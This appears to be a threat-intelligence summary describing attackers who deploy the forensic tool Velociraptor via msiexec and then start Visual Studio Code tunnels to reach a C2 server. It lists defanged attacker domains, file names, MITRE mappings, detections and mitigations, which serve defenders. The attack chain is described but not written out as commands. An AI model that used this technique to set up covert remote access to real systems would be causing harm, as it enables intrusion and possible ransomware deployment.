Full Report
This approach represents an evolution from threat actors abusing remote monitoring and management tools
Analysis Summary
# Tool/Technique: Velociraptor Abuse for Remote Access
## Overview
Threat actors are abusing the legitimate open-source Digital Forensics and Incident Response (DFIR) tool, Velociraptor, to gain remote access and potentially deploy follow-on malware like ransomware. The activity involved using Velociraptor to execute Visual Studio Code with its tunneling feature enabled to establish a connection to an attacker-controlled C2 server.
## Technical Details
- Type: Tool (Abused legitimate software)
- Platform: Windows (Implied by use of `msiexec` and PowerShell)
- Capabilities: Initial foothold establishment, downloading subsequent tools, establishing remote access via tunneling.
- First Seen: August 2025 (in this reported incident)
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (Implied by HTTP/S usage to Cloudflare Workers domains)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- TA0010 - Exfiltration (Potential precursor)
- TA0005 - Defense Evasion
- T1218 - Signed Binary Proxy Execution
- T1218.011 - Windows Utility Proxy Execution (Use of `msiexec`)
## Functionality
### Core Capabilities
- Deployment of Velociraptor via the `msiexec` utility downloading an MSI installer (`v2.msi`).
- Communication with a C2 server (`velo[.]qaubctgg[.]workers[.]dev`).
- Downloading and executing Visual Studio Code (`code.exe`) using an encoded PowerShell command.
### Advanced Features
- **Remote Access Tunneling:** Enabling the "tunnel" option in Visual Studio Code to create a persistent channel to the attacker's infrastructure, which allows for remote access and remote code execution capabilities.
- **Staging via Cloudflare Workers:** Utilizing attacker-controlled Cloudflare Workers domains (`files[.]qaubctgg[.]workers[.]dev`) as staging areas for tools (`v2.msi`, Radmin, `code.exe`).
## Indicators of Compromise
- File Hashes: [Not specifically provided in the text]
- File Names: `v2.msi`, `code.exe` (Visual Studio Code), `sc.msi` (additional malware installer)
- Registry Keys: [Not explicitly mentioned]
- Network Indicators:
- Staging Domain: `files[.]qaubctgg[.]workers[.]dev` (defanged)
- C2 Domain: `velo[.]qaubctgg[.]workers[.]dev` (defanged)
- Behavioral Indicators:
- Use of `msiexec` to download and execute remote access/tunneling tools.
- Execution of Visual Studio Code (`code.exe`) with the remote access/tunneling functionality enabled.
- Velociraptor process creation leading to execution of VS Code.
## Associated Threat Actors
- Multiple threat groups confirmed to have abused the Visual Studio Code tunneling feature in the past. (Specific actor name for this incident is not disclosed).
## Detection Methods
- Signature-based detection: Sophos detections listed: `Troj/Agent-BLMR`, `Troj/BatDl-PL`, `Troj/Mdrop-KDK`.
- Behavioral detection: Detection of the Visual Studio Code tunnel option triggering an alert (provided by Taegis™). Monitoring for unauthorized use of Velociraptor.
- YARA rules: [Not available in the text]
## Mitigation Strategies
- Implement Endpoint Detection and Response (EDR) systems.
- Monitor for and investigate unexpected or unauthorized use of legitimate tools like Velociraptor.
- Review system configurations to restrict access or usage patterns associated with the observed indicators.
- Follow best practices for system security and robust backup generation to minimize ransomware impact.
- Isolating affected hosts immediately upon detection.
## Related Tools/Techniques
- Remote Monitoring and Management (RMM) tools (general category of abused software).
- Radmin (mentioned as being staged alongside Velociraptor components).
- SimpleHelp (mentioned in context of prior RMM vulnerabilities).
- Quick Assist (mentioned in context of prior malware approaches).